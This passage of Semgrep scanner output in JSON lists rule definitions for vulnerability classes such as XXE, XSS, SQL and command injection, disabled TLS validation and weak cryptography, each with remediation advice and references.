[https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","id":"java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","name":"java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments."},"help":{"markdown":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","id":"cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","name":"cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","id":"java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","name":"java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account."},"help":{"markdown":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards)\n - [https://developer.apple.com/documentation/uikit/uipasteboard?language=swift](https://developer.apple.com/documentation/uikit/uipasteboard?language=swift)\n - [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/)\n","text":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account."},"helpUri":"https://semgrep.dev/r/swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","id":"swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","name":"swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","properties":{"precision":"very-high","tags":["CWE-477: Use of Obsolete Function","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"helpUri":"https://semgrep.dev/r/java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","id":"java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","name":"java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts."},"help":{"markdown":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param)\n - [https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/pages_security_tips_xss.htm](https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/pages_security_tips_xss.htm)\n","text":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts."},"helpUri":"https://semgrep.dev/r/generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","id":"generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","name":"generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread()."},"help":{"markdown":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-os1)\n","text":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread()."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-os1","id":"python.lang.compatibility.python37.python37-compatibility-os1","name":"python.lang.compatibility.python37.python37-compatibility-os1","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-os1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.sqli.pg-sqli.pg-sqli)\n - [https://pg.uptrace.dev/](https://pg.uptrace.dev/)\n - [https://pkg.go.dev/github.com/go-pg/pg/v10](https://pkg.go.dev/github.com/go-pg/pg/v10)\n","text":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'"},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.sqli.pg-sqli.pg-sqli","id":"go.lang.security.audit.sqli.pg-sqli.pg-sqli","name":"go.lang.security.audit.sqli.pg-sqli.pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.sqli.pg-sqli.pg-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security."},"help":{"markdown":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.insecure-uuid-version.insecure-uuid-version)\n - [https://www.landh.tech/blog/20230811-sandwich-attack/](https://www.landh.tech/blog/20230811-sandwich-attack/)\n","text":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security."},"helpUri":"https://semgrep.dev/r/python.lang.security.insecure-uuid-version.insecure-uuid-version","id":"python.lang.security.insecure-uuid-version.insecure-uuid-version","name":"python.lang.security.insecure-uuid-version.insecure-uuid-version","properties":{"precision":"very-high","tags":["CWE-330: Use of Insufficiently Random Values","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.insecure-uuid-version.insecure-uuid-version"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family."},"help":{"markdown":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.system-command.dont-call-system.dont-call-system)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.system-command.dont-call-system.dont-call-system","id":"cpp.lang.security.system-command.dont-call-system.dont-call-system","name":"cpp.lang.security.system-command.dont-call-system.dont-call-system","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.system-command.dont-call-system.dont-call-system"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request)\n - [https://owasp.org/www-community/attacks/Command_Injection](https://owasp.org/www-community/attacks/Command_Injection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)\n - [https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection)\n - [https://www.securecodewarrior.com/blog/coders-conquer-security-share-learn-series-os-command-injection](https://www.securecodewarrior.com/blog/coders-conquer-security-share-learn-series-os-command-injection)\n - [https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fdata_handling~2Finjection~2Foscmd](https://portal.securecodewarrior.com/#/learning-resources/application_security_weaknesses~2Fweb~2Fdata_handling~2Finjection~2Foscmd)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","id":"java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","name":"java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"help":{"markdown":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the insecure RC4 stream cipher encryption algorithm was identified. RC4 is deprecated and considered insecure. The application should leverage more suitable algorithms such as AES in GCM mode, or ChaChaPoly."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","id":"swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","name":"swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-algorithm-rc4.insecure-crypto-algorithm-rc4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_Security_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. The xml parsing libraries are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, they are still vulnerable to denial of service attacks such as billion laughs and quadratic blowup. To mitigate these attacks, it is recommended to use a different parser such as defusedxml."},"helpUri":"https://semgrep.dev/r/python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","id":"python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","name":"python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.xml.tainted-flask-xml-stdlib.tainted-flask-xml-stdlib"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Oracle update is not restricted in $F()"},"help":{"markdown":"Oracle update is not restricted in $F()\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control)\n - [https://medium.com/immunefi/sense-finance-access-control-issue-bugfix-review-32e0c806b1a0](https://medium.com/immunefi/sense-finance-access-control-issue-bugfix-review-32e0c806b1a0)\n","text":"Oracle update is not restricted in $F()"},"helpUri":"https://semgrep.dev/r/solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","id":"solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","name":"solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.sense-missing-oracle-access-control.sense-missing-oracle-access-control"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible."},"help":{"markdown":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.do-privileged-use.do-privileged-use)\n - [https://docs.oracle.com/javase/8/docs/technotes/guides/security/doprivileged.html](https://docs.oracle.com/javase/8/docs/technotes/guides/security/doprivileged.html)\n - [https://wiki.sei.cmu.edu/confluence/display/java/Privilege+Escalation](https://wiki.sei.cmu.edu/confluence/display/java/Privilege+Escalation)\n - [http://phrack.org/papers/escaping_the_java_sandbox.html](http://phrack.org/papers/escaping_the_java_sandbox.html)\n","text":"Marking code as privileged enables a piece of trusted code to temporarily enable access to more resources than are available directly to the code that called it. Be very careful in your use of the privileged construct, and always remember to make the privileged code section as small as possible."},"helpUri":"https://semgrep.dev/r/java.lang.security.do-privileged-use.do-privileged-use","id":"java.lang.security.do-privileged-use.do-privileged-use","name":"java.lang.security.do-privileged-use.do-privileged-use","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.do-privileged-use.do-privileged-use"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the 